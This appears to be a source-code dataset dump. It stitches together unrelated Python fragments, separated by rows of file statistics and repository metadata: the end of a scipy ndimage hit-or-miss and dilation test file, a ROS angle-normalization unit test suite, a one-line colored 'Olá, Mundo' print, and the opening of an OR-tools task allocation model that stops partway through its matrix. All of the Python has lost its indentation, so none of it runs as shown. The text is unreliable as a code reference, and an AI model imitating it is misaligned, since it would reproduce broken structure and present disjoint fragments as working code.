[0, 0, 0, 0, 0]], type_)
out = numpy.zeros(data.shape, bool)
ndimage.binary_hit_or_miss(data, struct, output=out)
assert_array_almost_equal(expected, out)
def test_hit_or_miss02(self):
struct = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]]
expected = [[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
for type_ in self.types:
data = numpy.array([[0, 1, 0, 0, 1, 1, 1, 0],
[1, 1, 1, 0, 0, 1, 0, 0],
[0, 1, 0, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], type_)
out = ndimage.binary_hit_or_miss(data, struct)
assert_array_almost_equal(expected, out)
def test_hit_or_miss03(self):
struct1 = [[0, 0, 0],
[1, 1, 1],
[0, 0, 0]]
struct2 = [[1, 1, 1],
[0, 0, 0],
[1, 1, 1]]
expected = [[0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
for type_ in self.types:
data = numpy.array([[0, 1, 0, 0, 1, 1, 1, 0],
[1, 1, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 0, 1, 1, 0],
[0, 0, 0, 0, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], type_)
out = ndimage.binary_hit_or_miss(data, struct1, struct2)
assert_array_almost_equal(expected, out)
class TestDilateFix:
def setup_method(self):
# dilation related setup
self.array = numpy.array([[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 1, 0],
[0, 0, 1, 1, 0],
[0, 0, 0, 0, 0]], dtype=numpy.uint8)
self.sq3x3 = numpy.ones((3, 3))
dilated3x3 = ndimage.binary_dilation(self.array, structure=self.sq3x3)
self.dilated3x3 = dilated3x3.view(numpy.uint8)
def test_dilation_square_structure(self):
result = ndimage.grey_dilation(self.array, structure=self.sq3x3)
# +1 accounts for difference between grey and binary dilation
assert_array_almost_equal(result, self.dilated3x3 + 1)
def test_dilation_scalar_size(self):
result = ndimage.grey_dilation(self.array, size=3)
assert_array_almost_equal(result, self.dilated3x3)
class TestBinaryOpeningClosing:
def setup_method(self):
a = numpy.zeros((5,5), dtype=bool)
a[1:4, 1:4] = True
a[4,4] = True
self.array = a
self.sq3x3 = numpy.ones((3,3))
self.opened_old = ndimage.binary_opening(self.array, self.sq3x3,
1, None, 0)
self.closed_old = ndimage.binary_closing(self.array, self.sq3x3,
1, None, 0)
def test_opening_new_arguments(self):
opened_new = ndimage.binary_opening(self.array, self.sq3x3, 1, None,
0, None, 0, False)
assert_array_equal(opened_new, self.opened_old)
def test_closing_new_arguments(self):
closed_new = ndimage.binary_closing(self.array, self.sq3x3, 1, None,
0, None, 0, False)
assert_array_equal(closed_new, self.closed_old)
| 44.09297
| 94
| 0.408964
| 27,811
| 211,999
| 3.014167
| 0.027903
| 0.12533
| 0.156751
| 0.17727
| 0.885979
| 0.867071
| 0.844895
| 0.824818
| 0.798704
| 0.778973
| 0
| 0.138959
| 0.443535
| 211,999
| 4,807
| 95
| 44.102143
| 0.57162
| 0.014392
| 0
| 0.744686
| 0
| 0
| 0.003816
| 0
| 0
| 0
| 0
| 0
| 0.109087
| 1
| 0.088764
| false
| 0
| 0.001869
| 0.006307
| 0.098342
| 0.023593
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
13b6a41b73f1b10f46f8b2be70dbdc97806b3e1c
| 14,706
|
py
|
Python
|
src/workspace/src/angles/test/utest.py
|
glabmoris/Poseidon
|
801dad37ab49adc1a31ccfc1e551c02676ad77c0
|
[
"MIT"
] | 4
|
2021-04-21T05:20:23.000Z
|
2022-02-28T21:20:25.000Z
|
src/workspace/src/angles/test/utest.py
|
glabmoris/Poseidon
|
801dad37ab49adc1a31ccfc1e551c02676ad77c0
|
[
"MIT"
] | 38
|
2021-09-07T16:39:14.000Z
|
2022-03-15T13:41:07.000Z
|
src/workspace/src/angles/test/utest.py
|
glabmoris/Poseidon
|
801dad37ab49adc1a31ccfc1e551c02676ad77c0
|
[
"MIT"
] | 9
|
2021-04-01T15:34:43.000Z
|
2021-11-09T19:07:08.000Z
|
#!/usr/bin/env python
#*********************************************************************
# Software License Agreement (BSD License)
#
# Copyright (c) 2015, Bossa Nova Robotics
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the Bossa Nova Robotics nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#********************************************************************/
from angles import normalize_angle_positive, normalize_angle, shortest_angular_distance, two_pi_complement, shortest_angular_distance_with_limits, shortest_angular_distance_with_large_limits
from angles import _find_min_max_delta
import sys
import unittest
from math import pi, fabs
## A sample python unit test
class TestAngles(unittest.TestCase):
def test_shortestDistanceWithLimits(self):
result, shortest_angle = shortest_angular_distance_with_limits(-0.5, 0.5,-0.25,0.25)
self.assertFalse(result)
result, shortest_angle = shortest_angular_distance_with_limits(-0.5, 0.5,0.25,0.25)
self.assertFalse(result)
result, shortest_angle = shortest_angular_distance_with_limits(-0.5, 0.5,0.25,-0.25)
self.assertTrue(result)
self.assertAlmostEqual(shortest_angle, -2*pi+1.0)
result, shortest_angle = shortest_angular_distance_with_limits(0.5, 0.5,0.25,-0.25)
self.assertTrue(result)
self.assertAlmostEqual(shortest_angle, 0)
result, shortest_angle = shortest_angular_distance_with_limits(0.5, 0,0.25,-0.25)
self.assertFalse(result)
self.assertAlmostEqual(shortest_angle, -0.5)
result, shortest_angle = shortest_angular_distance_with_limits(-0.5, 0,0.25,-0.25)
self.assertFalse(result)
self.assertAlmostEqual(shortest_angle, 0.5)
result, shortest_angle = shortest_angular_distance_with_limits(-0.2,0.2,0.25,-0.25)
self.assertFalse(result)
self.assertAlmostEqual(shortest_angle, -2*pi+0.4)
result, shortest_angle = shortest_angular_distance_with_limits(0.2,-0.2,0.25,-0.25)
self.assertFalse(result)
self.assertAlmostEqual(shortest_angle,2*pi-0.4)
result, shortest_angle = shortest_angular_distance_with_limits(0.2,0,0.25,-0.25)
self.assertFalse(result)
self.assertAlmostEqual(shortest_angle,2*pi-0.2)
result, shortest_angle = shortest_angular_distance_with_limits(-0.2,0,0.25,-0.25)
self.assertFalse(result)
self.assertAlmostEqual(shortest_angle,-2*pi+0.2)
result, shortest_angle = shortest_angular_distance_with_limits(-0.25,-0.5,0.25,-0.25)
self.assertTrue(result)
self.assertAlmostEqual(shortest_angle,-0.25)
result, shortest_angle = shortest_angular_distance_with_limits(-0.25,0.5,0.25,-0.25)
self.assertTrue(result)
self.assertAlmostEqual(shortest_angle,-2*pi+0.75)
result, shortest_angle = shortest_angular_distance_with_limits(-0.2500001,0.5,0.25,-0.25)
self.assertTrue(result)
self.assertAlmostEqual(shortest_angle,-2*pi+0.5+0.2500001)
result, shortest_angle = shortest_angular_distance_with_limits(-0.6, 0.5,-0.25,0.25)
self.assertFalse(result)
result, shortest_angle = shortest_angular_distance_with_limits(-0.5, 0.6,-0.25,0.25)
self.assertFalse(result)
result, shortest_angle = shortest_angular_distance_with_limits(-0.6, 0.75,-0.25,0.3)
self.assertFalse(result)
result, shortest_angle = shortest_angular_distance_with_limits(-0.6, pi*3.0/4.0,-0.25,0.3)
self.assertFalse(result)
result, shortest_angle = shortest_angular_distance_with_limits(-pi, pi,-pi,pi)
self.assertTrue(result)
self.assertAlmostEqual(shortest_angle,0.0)
def test_shortestDistanceWithLargeLimits(self):
# 'delta' is valid
result, shortest_angle = shortest_angular_distance_with_large_limits(0, 10.5*pi, -2*pi, 2*pi)
self.assertTrue(result)
self.assertAlmostEqual(shortest_angle, 0.5*pi)
# 'delta' is not valid, but 'delta_2pi' is
result, shortest_angle = shortest_angular_distance_with_large_limits(0, 10.5*pi, -2*pi, 0.1*pi)
self.assertTrue(result)
self.assertAlmostEqual(shortest_angle, -1.5*pi)
# neither 'delta' nor 'delta_2pi' are valid
result, shortest_angle = shortest_angular_distance_with_large_limits(2*pi, pi, 2*pi-0.1, 2*pi+0.1)
self.assertFalse(result)
# start position outside limits
result, shortest_angle = shortest_angular_distance_with_large_limits(10.5*pi, 0, -2*pi, 2*pi)
self.assertFalse(result)
# invalid limits (lower > upper)
result, shortest_angle = shortest_angular_distance_with_large_limits(0, 0.1, 2*pi, -2*pi)
self.assertFalse(result)
# specific test case
result, shortest_angle = shortest_angular_distance_with_large_limits(0.999507, 1.0, -20*pi, 20*pi)
self.assertTrue(result)
self.assertAlmostEqual(shortest_angle, 0.000493)
def test_normalize_angle_positive(self):
self.assertAlmostEqual(0, normalize_angle_positive(0))
self.assertAlmostEqual(pi, normalize_angle_positive(pi))
self.assertAlmostEqual(0, normalize_angle_positive(2*pi))
self.assertAlmostEqual(pi, normalize_angle_positive(3*pi))
self.assertAlmostEqual(0, normalize_angle_positive(4*pi))
self.assertAlmostEqual(0, normalize_angle_positive(-0))
self.assertAlmostEqual(pi, normalize_angle_positive(-pi))
self.assertAlmostEqual(0, normalize_angle_positive(-2*pi))
self.assertAlmostEqual(pi, normalize_angle_positive(-3*pi))
self.assertAlmostEqual(0, normalize_angle_positive(-4*pi))
self.assertAlmostEqual(0, normalize_angle_positive(-0))
self.assertAlmostEqual(3*pi/2, normalize_angle_positive(-pi/2))
self.assertAlmostEqual(pi, normalize_angle_positive(-pi))
self.assertAlmostEqual(pi/2, normalize_angle_positive(-3*pi/2))
self.assertAlmostEqual(0, normalize_angle_positive(-4*pi/2))
self.assertAlmostEqual(0, normalize_angle_positive(0))
self.assertAlmostEqual(pi/2, normalize_angle_positive(pi/2))
self.assertAlmostEqual(pi/2, normalize_angle_positive(5*pi/2))
self.assertAlmostEqual(pi/2, normalize_angle_positive(9*pi/2))
self.assertAlmostEqual(pi/2, normalize_angle_positive(-3*pi/2))
def test_normalize_angle(self):
self.assertAlmostEqual(0, normalize_angle(0))
self.assertAlmostEqual(pi, normalize_angle(pi))
self.assertAlmostEqual(0, normalize_angle(2*pi))
self.assertAlmostEqual(pi, normalize_angle(3*pi))
self.assertAlmostEqual(0, normalize_angle(4*pi))
self.assertAlmostEqual(0, normalize_angle(-0))
self.assertAlmostEqual(pi, normalize_angle(-pi))
self.assertAlmostEqual(0, normalize_angle(-2*pi))
self.assertAlmostEqual(pi, normalize_angle(-3*pi))
self.assertAlmostEqual(0, normalize_angle(-4*pi))
self.assertAlmostEqual(0, normalize_angle(-0))
self.assertAlmostEqual(-pi/2, normalize_angle(-pi/2))
self.assertAlmostEqual(pi, normalize_angle(-pi))
self.assertAlmostEqual(pi/2, normalize_angle(-3*pi/2))
self.assertAlmostEqual(0, normalize_angle(-4*pi/2))
self.assertAlmostEqual(0, normalize_angle(0))
self.assertAlmostEqual(pi/2, normalize_angle(pi/2))
self.assertAlmostEqual(pi/2, normalize_angle(5*pi/2))
self.assertAlmostEqual(pi/2, normalize_angle(9*pi/2))
self.assertAlmostEqual(pi/2, normalize_angle(-3*pi/2))
def test_shortest_angular_distance(self):
self.assertAlmostEqual(pi/2, shortest_angular_distance(0, pi/2))
self.assertAlmostEqual(-pi/2, shortest_angular_distance(0, -pi/2))
self.assertAlmostEqual(-pi/2, shortest_angular_distance(pi/2, 0))
self.assertAlmostEqual(pi/2, shortest_angular_distance(-pi/2, 0))
self.assertAlmostEqual(-pi/2, shortest_angular_distance(pi, pi/2))
self.assertAlmostEqual(pi/2, shortest_angular_distance(pi, -pi/2))
self.assertAlmostEqual(pi/2, shortest_angular_distance(pi/2, pi))
self.assertAlmostEqual(-pi/2, shortest_angular_distance(-pi/2, pi))
self.assertAlmostEqual(-pi/2, shortest_angular_distance(5*pi, pi/2))
self.assertAlmostEqual(pi/2, shortest_angular_distance(7*pi, -pi/2))
self.assertAlmostEqual(pi/2, shortest_angular_distance(9*pi/2, pi))
self.assertAlmostEqual(pi/2, shortest_angular_distance(-3*pi/2, pi))
# Backside wrapping
self.assertAlmostEqual(-pi/2, shortest_angular_distance(-3*pi/4, 3*pi/4))
self.assertAlmostEqual(pi/2, shortest_angular_distance(3*pi/4, -3*pi/4))
def test_two_pi_complement(self):
epsilon = 1e-9
self.assertAlmostEqual(two_pi_complement(0), 2*pi)
self.assertAlmostEqual(two_pi_complement(2*pi), 0)
self.assertAlmostEqual(two_pi_complement(-2*pi), 0)
self.assertAlmostEqual(two_pi_complement(2*pi-epsilon), -epsilon)
self.assertAlmostEqual(two_pi_complement(-2*pi+epsilon), epsilon)
self.assertAlmostEqual(two_pi_complement(pi/2), -3*pi/2)
self.assertAlmostEqual(two_pi_complement(pi), -pi)
self.assertAlmostEqual(two_pi_complement(-pi), pi)
self.assertAlmostEqual(two_pi_complement(-pi/2), 3*pi/2)
self.assertAlmostEqual(two_pi_complement(3*pi), -pi)
self.assertAlmostEqual(two_pi_complement(-3.0*pi), pi)
self.assertAlmostEqual(two_pi_complement(-5.0*pi/2.0), 3*pi/2)
def test_find_min_max_delta(self):
epsilon = 1e-9
# Straight forward full range
flag, min_delta, max_delta = _find_min_max_delta( 0, -pi, pi)
self.assertTrue(flag)
self.assertAlmostEqual(min_delta, -pi)
self.assertAlmostEqual(max_delta, pi)
# pi/2 Full Range
flag, min_delta, max_delta = _find_min_max_delta( pi/2, -pi, pi)
self.assertTrue(flag)
self.assertAlmostEqual(min_delta, -3*pi/2)
self.assertAlmostEqual(max_delta, pi/2)
# -pi/2 Full range
flag, min_delta, max_delta = _find_min_max_delta( -pi/2, -pi, pi)
self.assertTrue(flag)
self.assertAlmostEqual(min_delta, -pi/2)
self.assertAlmostEqual(max_delta, 3*pi/2)
# Straight forward partial range
flag, min_delta, max_delta = _find_min_max_delta( 0, -pi/2, pi/2)
self.assertTrue(flag)
self.assertAlmostEqual(min_delta, -pi/2)
self.assertAlmostEqual(max_delta, pi/2)
# pi/4 Partial Range
flag, min_delta, max_delta = _find_min_max_delta( pi/4, -pi/2, pi/2)
self.assertTrue(flag)
self.assertAlmostEqual(min_delta, -3*pi/4)
self.assertAlmostEqual(max_delta, pi/4)
# -pi/4 Partial Range
flag, min_delta, max_delta = _find_min_max_delta( -pi/4, -pi/2, pi/2)
self.assertTrue(flag)
self.assertAlmostEqual(min_delta, -pi/4)
self.assertAlmostEqual(max_delta, 3*pi/4)
# bump stop negative full range
flag, min_delta, max_delta = _find_min_max_delta( -pi, -pi, pi)
self.assertTrue(flag)
self.assertTrue((fabs(min_delta) <= epsilon and fabs(max_delta - 2*pi) <= epsilon) or (fabs(min_delta+2*pi) <= epsilon and fabs(max_delta) <= epsilon))
self.assertAlmostEqual(min_delta, 0.0)
self.assertAlmostEqual(max_delta, 2*pi)
flag, min_delta, max_delta = _find_min_max_delta(-0.25,0.25,-0.25)
self.assertTrue(flag)
self.assertAlmostEqual(min_delta, -2*pi+0.5)
self.assertAlmostEqual(max_delta, 0.0)
# bump stop positive full range
flag, min_delta, max_delta = _find_min_max_delta( pi-epsilon, -pi, pi)
self.assertTrue(flag)
#self.assertTrue((fabs(min_delta) <= epsilon and fabs(max_delta - 2*pi) <= epsilon) or (fabs(min_delta+2*pi) <= epsilon and fabs(max_delta) <= epsilon))
self.assertAlmostEqual(min_delta, -2*pi+epsilon)
self.assertAlmostEqual(max_delta, epsilon)
# bump stop negative partial range
flag, min_delta, max_delta = _find_min_max_delta( -pi, -pi, pi)
self.assertTrue(flag)
self.assertAlmostEqual(min_delta, 0)
self.assertAlmostEqual(max_delta, 2*pi)
# bump stop positive partial range
flag, min_delta, max_delta = _find_min_max_delta( -pi/2, -pi/2, pi/2)
self.assertTrue(flag)
self.assertAlmostEqual(min_delta, 0.0)
self.assertAlmostEqual(max_delta, pi)
#Test out of range negative
flag, min_delta, max_delta = _find_min_max_delta( -pi, -pi/2, pi/2)
self.assertFalse(flag)
#Test out of range postive
flag, min_delta, max_delta = _find_min_max_delta( pi, -pi/2, pi/2)
self.assertFalse(flag)
# pi/4 Partial Range
flag, min_delta, max_delta = _find_min_max_delta( 3*pi/4, pi/2, -pi/2)
self.assertTrue(flag)
self.assertAlmostEqual(min_delta, -pi/4)
self.assertAlmostEqual(max_delta, 3*pi/4)
if __name__ == '__main__':
import rosunit
rosunit.unitrun('angles', 'test_python_angles', TestAngles)
| 47.592233
| 190
| 0.690806
| 1,992
| 14,706
| 4.89006
| 0.104418
| 0.226363
| 0.099168
| 0.072067
| 0.789549
| 0.769018
| 0.759265
| 0.736988
| 0.71892
| 0.659173
| 0
| 0.041326
| 0.192098
| 14,706
| 308
| 191
| 47.746753
| 0.778554
| 0.165307
| 0
| 0.36
| 0
| 0
| 0.002619
| 0
| 0
| 0
| 0
| 0
| 0.72
| 1
| 0.035
| false
| 0
| 0.03
| 0
| 0.07
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b91d92114aad99ab71bcc79c0a5cb6fa118d65de
| 30
|
py
|
Python
|
AULA 11 - Cores no terminal/exemplo 02.py
|
luizhmfonseca/Estudos-Python
|
4ed50835a1fd68d3066fcfa57355e48a2f5e4978
|
[
"MIT"
] | 2
|
2021-03-15T22:07:59.000Z
|
2021-11-09T11:52:37.000Z
|
AULA 11 - Cores no terminal/exemplo 02.py
|
luizhmfonseca/Estudos-Python
|
4ed50835a1fd68d3066fcfa57355e48a2f5e4978
|
[
"MIT"
] | null | null | null |
AULA 11 - Cores no terminal/exemplo 02.py
|
luizhmfonseca/Estudos-Python
|
4ed50835a1fd68d3066fcfa57355e48a2f5e4978
|
[
"MIT"
] | null | null | null |
print('\33[31;43mOlá, Mundo!')
| 30
| 30
| 0.666667
| 5
| 30
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.206897
| 0.033333
| 30
| 1
| 30
| 30
| 0.482759
| 0
| 0
| 0
| 0
| 0
| 0.677419
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
b9427eb96bcc6ddaed3c787eeaf300b3a0dd8245
| 11,916
|
py
|
Python
|
examples/python/task_allocation_sat.py
|
sreesubbash/or-tools
|
701496e45d54fa9938afeedec43089314d93ec11
|
[
"Apache-2.0"
] | 1
|
2021-03-30T21:10:27.000Z
|
2021-03-30T21:10:27.000Z
|
examples/python/task_allocation_sat.py
|
sreesubbash/or-tools
|
701496e45d54fa9938afeedec43089314d93ec11
|
[
"Apache-2.0"
] | null | null | null |
examples/python/task_allocation_sat.py
|
sreesubbash/or-tools
|
701496e45d54fa9938afeedec43089314d93ec11
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2010-2018 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""CP-SAT model for task allocation problem.
see
http://yetanothermathprogrammingconsultant.blogspot.com/2018/09/minizinc-cpsat-vs-mip.html
"""
from ortools.sat.python import cp_model
def main():
"""Solves the task allocation problem."""
# Availability matrix.
available = [[
0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1,
1, 1
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1,
1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1,
1, 0
], [
0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 1
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 1
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1,
1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0
], [
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1,
1, 1
], [
